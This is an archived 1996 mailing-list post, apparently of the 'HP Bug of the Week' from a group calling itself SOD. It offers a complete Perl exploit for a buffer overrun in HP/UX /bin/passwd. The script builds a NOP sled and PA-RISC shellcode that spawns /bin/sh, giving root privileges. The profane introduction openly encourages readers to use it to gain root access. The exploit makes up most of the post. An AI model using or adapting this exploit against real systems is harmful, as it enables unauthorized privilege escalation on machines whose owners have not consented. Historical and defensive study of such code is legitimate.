HP Bug of the Week!

Aleph One (aleph1@dfw.net)
Sat, 23 Nov 1996 08:19:34 -0600
Messages sorted by: [ date ][ thread ][ subject ][ author ]
Previous message: Scriptors of DOOM: "(no subject)"

you are easily offended:



   This week: If I had a life, I wouldn't spend my Friday nights giving

   you bugs





   Good fuckin' day, eh? Welcome to the HP Bug of the Week -- if you

   haven't come here looking for security holes to HP/UX computers,

   you've come to the wrong fucking place. Otherwise look no further

   because you've found the fuckin' mecca of the fuckin' desert. Our goal

   here is to distribute those HP bugeridoo's as far and wide as is

   fucking humanly possible, so tell a friend if you have one. We've got

   a root hole from a buffer overrun in /bin/passwd this week, plus a

   whole new section called "Other Folks Scripts" that rakes in the

   wonderful works of other net.scriptors. So come on in, look around,

   take all you want but eat all you take and as always, start clicking

   your way to root access with scripts from the motherfuckin' folks at

   SOD.



   Vulgarity rating: 6 (scalawag)



Caveat Emptor



   passwd is broked script for this week



#!/usr/bin/perl



# SOD /bin/passwd buffer overrun



use FileHandle;



sub h2cs {

  local($stuff)=@_;

  local($rv);

  while($stuff !~ /^$/) {

    $bob=$stuff;

    $bob =~ s/^(..).*$/$1/;

    $stuff =~ s/^..//;

    $rv.=chr(oct("0x${bob}"));

    }

  return $rv;

  }



open(PIPE,"uname -r|");

chop($rev=<PIPE>);

close(PIPE);

$rev =~ s/^.*\.(.*)\..*$/$1/;



if ($rev eq "10") {

  $offset=2102;

  $prealign="AA"; # 2 byte pre

  $postalign=""; # 0 byte post

  $pcoq=h2cs("7b03b463");

  } else {

  $offset=2170; # 2170 works for 9.X...

  $prealign=""; # zero byte pre

  $postalign="PP"; # 2 byte post

  $pcoq=h2cs("7b033018");

  }



$nop=h2cs("08210280");

$code="";

$code.=h2cs("34160506"); # LDI 643,r22

$code.=h2cs("96d60534"); # SUBI 666,r22,r22

$code.=h2cs("20200801"); # LDIL L%0xc0000004,r1

$code.=h2cs("e420e008"); # BLE 4(sr7,r1)

$code.=h2cs("0b5a029a"); # XOR arg0,arg0,arg0

$code.=h2cs("e83f1ffd"); # BL .+8,r1

$code.=h2cs("08210280"); # NOP

$code.=h2cs("34020102"); # LDI 129,rp

$code.=h2cs("08410402"); # SUB r1,rp,rp

$code.=h2cs("60400162"); # STB r0,177(rp)

$code.=h2cs("b45a0154"); # ADDI 170,rp,arg0

$code.=h2cs("0b390299"); # XOR arg1,arg1,arg1

$code.=h2cs("0b180298"); # XOR arg2,arg2,arg2

$code.=h2cs("341604be"); # LDI 607,r22

$code.=h2cs("20200801"); # LDIL L%0xc0000004,r1

$code.=h2cs("e420e008"); # BLE 4(sr7,r1)

$code.=h2cs("96d60534"); # SUB 666,r22,r22

$code.=h2cs("deadcafe"); # Illegal instruction -- dump core if exec fails

$data="/bin/sh."; # Data stuff



$codedata=$code.$data;

$num=int(($offset-length($code)-length($data)-4)/4);

$pre="$nop"x$num;

$of=$prealign;

$of.=$pre.$code.$data.$postalign.$pcoq;

exec("/bin/passwd","$of");





Aleph One / aleph1@dfw.net

http://underground.org/

KeyID 1024/948FD6B5

Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01
Previous message: Scriptors of DOOM: "(no subject)"